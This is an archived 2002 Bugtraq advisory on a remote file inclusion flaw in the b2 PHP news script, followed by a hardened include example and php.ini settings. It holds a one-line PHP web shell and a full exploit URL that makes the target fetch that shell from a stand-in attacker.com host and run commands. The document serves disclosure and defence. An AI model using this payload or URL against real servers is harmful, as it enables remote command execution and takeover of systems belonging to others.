8400032 2002-05-06 10:13 +0000 /56 lines/ Frank <thran60@hotmail.com>
Sent by: joel@lysator.liu.se
Imported: 2002-05-06 17:12 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <22179>
Subject: b2 php remote command execution
------------------------------------------------------------
From: Frank <thran60@hotmail.com>
To: bugtraq@securityfocus.com
Message-ID: <20020506101337.9743.qmail@mail.securityfocus.com>

Site: www.cafelog.com
Vulnerable: b2 0.6pre2 and earlier.

B2 is a PHP script which allows webmasters to quickly post news on the
front page and lets viewers interact with each other. A bug exists in
the scripts which allows an attacker to remotely execute commands.

Exploit:

Taken from /b2-include/b2edit.showposts.php

*snippet*
<?php
include_once ("b2config.php");
include_once ($b2inc."/b2functions.php");
*snippet*

But since b2config.php does not exist inside that directory, the first
include fails and $b2inc is never set, so an attacker can define $b2inc
himself. If the attacker creates a file on his server, for example
www.attacker.com, called b2functions.php, and writes the following in it:

<? system($cmd); ?>

(note: the attacker's server must not be able to run PHP; it has to serve
the file as text) he can include the file like this:

http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls

This would execute the ls command on vulnerablehost.com.

Fix: Copy b2config.php into the b2-include directory.

The vendor has been warned, and already released the same fix a few days
earlier.

(8400032) /Frank <thran60@hotmail.com>/-------------
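The preamble quoted above is vulnerable for two independent reasons: the include path is built from a variable that the script never sets when its own configuration file is missing, and PHP's register_globals (on by default in that era) lets a request parameter such as ?b2inc= populate that variable. The following is an added example of how the same preamble can be written so that neither condition matters; it is not b2's own code, and the helper b2_safe_include_path is a name chosen for this illustration.

```php
<?php
// Hardened equivalent of the b2edit.showposts.php preamble (added example,
// not the b2 project's code). The include directory is derived from this
// file's own location, so no request variable can influence it, whether
// register_globals is on or off.
$b2inc = dirname(__FILE__);

// Refuse to run if the configuration is missing, instead of silently
// continuing with $b2inc undefined as the original script did.
$config = $b2inc . '/b2config.php';
if (!is_file($config)) {
    header('HTTP/1.0 500 Internal Server Error');
    exit('b2: configuration file missing; refusing to run.');
}
include_once $config;

// Defence in depth: even if some later bug lets request data reach an
// include, accept only a plain .php file name that resolves inside $dir.
// URL wrappers (http://...) and traversal (../) are rejected before any
// filesystem access, and realpath() confirms the final location.
function b2_safe_include_path($dir, $name)
{
    if (!preg_match('/^[A-Za-z0-9_-]+\.php$/', $name)) {
        return false;
    }
    $base = realpath($dir);
    $real = realpath($dir . '/' . $name);
    if ($base === false || $real === false) {
        return false;
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $real;
}

$functions = b2_safe_include_path($b2inc, 'b2functions.php');
if ($functions === false) {
    header('HTTP/1.0 500 Internal Server Error');
    exit('b2: required library missing; refusing to run.');
}
include_once $functions;
```

Two php.ini settings address the same class of bug at the interpreter level and are worth checking on any host that runs third-party PHP: register_globals = Off (the directive was removed entirely in PHP 5.4) stops request parameters from becoming variables, and allow_url_include = Off (available from PHP 5.2) stops include/require from fetching remote URLs even when a path variable is attacker-controlled.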